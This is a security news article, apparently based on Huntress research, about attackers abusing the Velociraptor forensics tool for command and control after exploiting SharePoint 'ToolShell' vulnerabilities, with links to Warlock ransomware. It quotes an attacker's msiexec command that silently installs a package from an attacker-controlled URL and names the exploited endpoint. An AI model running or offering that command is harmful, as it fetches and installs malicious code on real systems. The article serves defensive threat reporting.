Sophisticated hackers are increasingly weaponizing legitimate security tools for malicious purposes, a trend highlighted by the exploitation of Velociraptor, a popular Digital Forensics and Incident Response (DFIR) tool. Attackers are leveraging Velociraptor to establish stealthy Command and Control (C2) channels, allowing them to execute commands and maintain persistent access within compromised networks, bypassing traditional security measures. This evolving tactic was observed in campaigns throughout late 2025, targeting enterprise infrastructure like Windows Server Update Services (WSUS) and Microsoft SharePoint, and in some instances, delivering the Warlock ransomware.
Huntress security analysts identified this concerning pattern after investigating three separate incidents between September and November. Their research linked specific digital fingerprints, such as the hostname DESKTOP-C1N9M, to a financially motivated threat group identified as Storm-2603. The adversaries demonstrated a high degree of operational security, employing techniques like Cloudflare tunnels and digitally signed binaries to evade endpoint defenses and avoid network blocklists.
Exploiting SharePoint for Stealthy Access and Velociraptor Deployment
The infection chain heavily relies on the exploitation of the “ToolShell” vulnerability chain within Microsoft SharePoint. Attackers initially bypass authentication mechanisms using CVE-2025-49706 by sending specially crafted HTTP POST requests to the /_layouts/15/ToolPane.aspx endpoint. This initial compromise is then chained with a secondary remote code execution vulnerability, CVE-2025-49704, to inject malicious web shells into legitimate files such as start.aspx.
Indications of these unauthorized actions can be found within suspicious IIS access logs, particularly those showing activity in the /_layouts/15/ directory. Once a web shell is successfully deployed, the threat actors proceed to download and install Velociraptor using Windows Installer. A common command observed during these attacks is:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
This installation process registers Velociraptor as a system service, ensuring that it persists across system reboots. Evidence of this autorun service creation has been noted in security analysis. To solidify their foothold in the compromised environment, the attackers then utilize the installed Velociraptor instance to execute Base64 encoded PowerShell commands. These scripts are designed to download Visual Studio Code (code.exe) and establish outbound tunnels, a method that effectively masks their malicious network traffic as legitimate development activity.
The logs generated by Visual Studio Code during this tunnel creation process provide further insight into the attackers’ methodology. These logs demonstrate the pivot from using a DFIR tool for initial access to orchestrating broader network control. This sophisticated approach, combining vulnerability exploitation with the misuse of security tooling like Velociraptor, presents a significant challenge for defenders attempting to distinguish between genuine incident response activities and active intrusions. The ongoing evolution of these tactics suggests that organizations must continue to enhance their threat detection capabilities, focusing on abnormal tool usage and network traffic patterns originating from unexpected sources.
The implications of this evolving threat landscape are considerable. The ability of threat actors to leverage legitimate tools not only allows for stealthier operations but also potentially broader impact due to the widespread adoption of these tools in enterprise environments. Defense strategies will need to adapt to identify the misuse of benign software, requiring a deeper understanding of both normal and abnormal operational patterns within an organization’s network. As such campaigns continue to surface, information sharing and prompt analysis of new indicators of compromise will be crucial for effective cybersecurity.